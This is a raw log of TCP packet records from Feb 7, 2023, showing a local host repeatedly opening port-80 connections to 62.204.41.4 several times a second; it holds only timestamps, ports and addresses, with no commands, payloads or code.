Feb 7, 2023 19:57:09.399925947 CET	80	49711	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.403405905 CET	49711	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.506622076 CET	49711	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.507822037 CET	49712	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.567516088 CET	80	49711	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.567745924 CET	49711	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.571312904 CET	80	49712	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.571455956 CET	49712	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.572155952 CET	49712	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.634834051 CET	80	49712	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.637331009 CET	80	49712	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.637973070 CET	49712	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.744168997 CET	49712	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.745663881 CET	49713	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.806130886 CET	80	49713	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.806240082 CET	49713	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.806364059 CET	80	49712	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.806431055 CET	49712	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.809087992 CET	49713	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:09.869576931 CET	80	49713	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.872056961 CET	80	49713	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:09.874027014 CET	49713	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.013694048 CET	49713	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.015921116 CET	49714	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.074328899 CET	80	49713	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.075043917 CET	49713	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.076205969 CET	80	49714	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.076345921 CET	49714	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.084490061 CET	49714	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.144715071 CET	80	49714	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.148363113 CET	80	49714	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.151041985 CET	49714	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.257035971 CET	49714	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.258028030 CET	49715	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.317521095 CET	80	49714	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.317620039 CET	49714	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.319073915 CET	80	49715	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.319312096 CET	49715	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.319689035 CET	49715	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.379889011 CET	80	49715	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.382231951 CET	80	49715	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.382356882 CET	49715	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.490839958 CET	49715	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.491769075 CET	49719	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.551105976 CET	80	49715	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.551337004 CET	49715	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.554167986 CET	80	49719	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.554361105 CET	49719	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.555435896 CET	49719	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.617889881 CET	80	49719	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.620309114 CET	80	49719	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.620454073 CET	49719	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.725444078 CET	49719	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.726728916 CET	49720	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.787832022 CET	80	49719	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.787941933 CET	49719	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.788774967 CET	80	49720	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.788975000 CET	49720	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.789751053 CET	49720	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.851376057 CET	80	49720	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.853640079 CET	80	49720	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:10.854883909 CET	49720	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.975394964 CET	49721	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:10.975733995 CET	49720	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.037419081 CET	80	49720	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.037611961 CET	49720	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.037956953 CET	80	49721	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.038098097 CET	49721	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.038423061 CET	49721	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.100792885 CET	80	49721	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.104434967 CET	80	49721	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.104595900 CET	49721	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.212960005 CET	49721	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.214515924 CET	49722	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.274853945 CET	80	49722	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.274961948 CET	49722	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.275289059 CET	49722	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.275361061 CET	80	49721	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.275451899 CET	49721	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.335553885 CET	80	49722	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.338613033 CET	80	49722	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.338671923 CET	49722	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.443695068 CET	49722	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.444418907 CET	49723	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.504265070 CET	80	49722	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.504373074 CET	49722	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.506047964 CET	80	49723	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.506335020 CET	49723	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.507306099 CET	49723	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.569005966 CET	80	49723	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.572401047 CET	80	49723	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.572483063 CET	49723	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.679683924 CET	49723	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.680562019 CET	49724	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.741586924 CET	80	49723	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.741720915 CET	49723	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.742954016 CET	80	49724	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.743078947 CET	49724	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.745482922 CET	49724	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.808042049 CET	80	49724	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.811316967 CET	80	49724	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.811398029 CET	49724	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.928680897 CET	49724	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.929665089 CET	49725	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.990931034 CET	80	49725	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.991086006 CET	80	49724	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:11.991096020 CET	49725	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.991167068 CET	49724	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:11.991746902 CET	49725	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.052915096 CET	80	49725	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.057265997 CET	80	49725	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.057351112 CET	49725	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.200900078 CET	49725	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.201531887 CET	49726	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.262136936 CET	80	49726	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.262180090 CET	80	49725	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.262280941 CET	49726	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.262362957 CET	49725	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.281502008 CET	49726	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.342273951 CET	80	49726	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.344497919 CET	80	49726	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.344656944 CET	49726	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.460308075 CET	49726	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.469690084 CET	49727	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.521100044 CET	80	49726	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.521275997 CET	49726	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.532078981 CET	80	49727	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.532227039 CET	49727	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.532927990 CET	49727	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.595164061 CET	80	49727	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.597369909 CET	80	49727	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.597529888 CET	49727	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.709681034 CET	49727	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.710390091 CET	49728	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.771972895 CET	80	49728	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.772025108 CET	80	49727	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.772259951 CET	49727	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.772285938 CET	49728	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.773087025 CET	49728	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.834731102 CET	80	49728	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.836726904 CET	80	49728	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:12.840225935 CET	49728	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.944730997 CET	49728	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:12.945653915 CET	49729	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.006551981 CET	80	49728	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.006757975 CET	49728	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.007029057 CET	80	49729	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.007281065 CET	49729	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.008119106 CET	49729	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.069473982 CET	80	49729	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.072851896 CET	80	49729	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.074580908 CET	49729	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.179425001 CET	49729	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.180597067 CET	49730	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.240971088 CET	80	49729	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.241126060 CET	49729	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.242955923 CET	80	49730	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.243141890 CET	49730	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.243832111 CET	49730	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.306238890 CET	80	49730	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.308459997 CET	80	49730	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.308612108 CET	49730	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.415498972 CET	49730	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.416620016 CET	49731	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.476223946 CET	80	49731	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.476449966 CET	49731	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.477085114 CET	49731	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.478041887 CET	80	49730	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.478149891 CET	49730	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.536500931 CET	80	49731	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.540271044 CET	80	49731	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.540417910 CET	49731	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.647214890 CET	49731	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.648072004 CET	49732	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.707060099 CET	80	49731	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.707266092 CET	49731	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.709708929 CET	80	49732	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.709836006 CET	49732	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.710639000 CET	49732	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.772305965 CET	80	49732	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.774626017 CET	80	49732	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.774720907 CET	49732	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.882328033 CET	49732	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.883912086 CET	49733	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.944355965 CET	80	49732	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.944410086 CET	80	49733	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:13.944560051 CET	49732	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.944700956 CET	49733	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:13.945818901 CET	49733	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.006417990 CET	80	49733	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.009073019 CET	80	49733	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.009185076 CET	49733	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.117237091 CET	49733	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.118577003 CET	49734	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.178567886 CET	80	49733	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.178801060 CET	49733	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.181713104 CET	80	49734	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.181802988 CET	49734	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.182238102 CET	49734	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.244606972 CET	80	49734	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.248008013 CET	80	49734	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.248074055 CET	49734	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.364550114 CET	49734	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.382941961 CET	49735	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.427006960 CET	80	49734	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.427087069 CET	49734	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.443649054 CET	80	49735	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.443758011 CET	49735	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.444183111 CET	49735	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.504812002 CET	80	49735	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.507704973 CET	80	49735	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.507767916 CET	49735	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.615705967 CET	49735	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.616415977 CET	49736	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.677279949 CET	80	49735	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.677367926 CET	49735	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.679317951 CET	80	49736	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.679514885 CET	49736	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.683729887 CET	49736	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.746838093 CET	80	49736	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.750108004 CET	80	49736	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.750212908 CET	49736	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.869304895 CET	49736	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.870182991 CET	49737	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.934561968 CET	80	49737	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.934598923 CET	80	49736	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:14.934686899 CET	49737	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.934719086 CET	49736	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.935622931 CET	49737	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:14.998846054 CET	80	49737	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.002446890 CET	80	49737	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.002579927 CET	49737	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.115957022 CET	49737	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.116791964 CET	49738	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.177634001 CET	80	49738	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.177803993 CET	80	49737	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.177959919 CET	49737	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.178369045 CET	49738	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.178369045 CET	49738	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.242544889 CET	80	49738	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.243549109 CET	80	49738	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.243712902 CET	49738	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.350567102 CET	49738	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.351478100 CET	49739	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.412074089 CET	80	49738	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.412157059 CET	49738	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.412693977 CET	80	49739	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.412797928 CET	49739	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.413161039 CET	49739	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.474494934 CET	80	49739	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.476524115 CET	80	49739	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.478899002 CET	49739	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.600214958 CET	49739	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.601080894 CET	49740	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.661406994 CET	80	49740	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.661632061 CET	80	49739	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.661694050 CET	49740	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.662782907 CET	49740	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.662784100 CET	49739	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.723228931 CET	80	49740	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.726018906 CET	80	49740	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.726169109 CET	49740	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.847049952 CET	49740	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.848073006 CET	49741	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.907983065 CET	80	49740	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.909534931 CET	80	49741	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.909679890 CET	49740	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.909743071 CET	49741	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.910290003 CET	49741	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:15.973949909 CET	80	49741	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.974092007 CET	80	49741	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:15.974170923 CET	49741	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.085179090 CET	49741	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.086483002 CET	49742	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.146271944 CET	80	49742	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.146747112 CET	80	49741	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.146811962 CET	49742	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.146851063 CET	49741	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.147994041 CET	49742	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.207473040 CET	80	49742	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.211469889 CET	80	49742	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.211657047 CET	49742	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.319566965 CET	49742	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.320588112 CET	49743	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.379302979 CET	80	49742	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.379501104 CET	49742	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.382244110 CET	80	49743	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.382395983 CET	49743	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.382886887 CET	49743	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.444340944 CET	80	49743	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.449038982 CET	80	49743	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.449182987 CET	49743	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.600537062 CET	49743	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.601418018 CET	49744	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.662873983 CET	80	49743	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.662985086 CET	49743	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.663551092 CET	80	49744	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.663646936 CET	49744	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.664079905 CET	49744	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.725534916 CET	80	49744	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.729906082 CET	80	49744	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.730057955 CET	49744	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.836163998 CET	49744	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.836869001 CET	49745	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.897321939 CET	80	49745	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.897494078 CET	49745	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.897613049 CET	80	49744	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.897716999 CET	49744	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.898022890 CET	49745	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:16.958384991 CET	80	49745	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.960987091 CET	80	49745	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:16.961150885 CET	49745	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.073137999 CET	49745	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.074124098 CET	49746	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.133589983 CET	80	49745	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.133661985 CET	49745	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.135358095 CET	80	49746	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.135462046 CET	49746	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.135799885 CET	49746	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.197036028 CET	80	49746	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.201457024 CET	80	49746	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.201575994 CET	49746	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.321413040 CET	49746	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.322314978 CET	49747	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.381809950 CET	80	49747	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.381922960 CET	49747	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.382668972 CET	80	49746	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.382761002 CET	49746	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.384762049 CET	49747	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.445012093 CET	80	49747	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.446343899 CET	80	49747	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.446428061 CET	49747	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.557583094 CET	49747	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.558510065 CET	49748	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.617105007 CET	80	49747	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.617273092 CET	49747	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.619225979 CET	80	49748	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:17.619383097 CET	49748	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.627779961 CET	49748	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:17.688498020 CET	80	49748	62.204.41.4	192.168.2.5
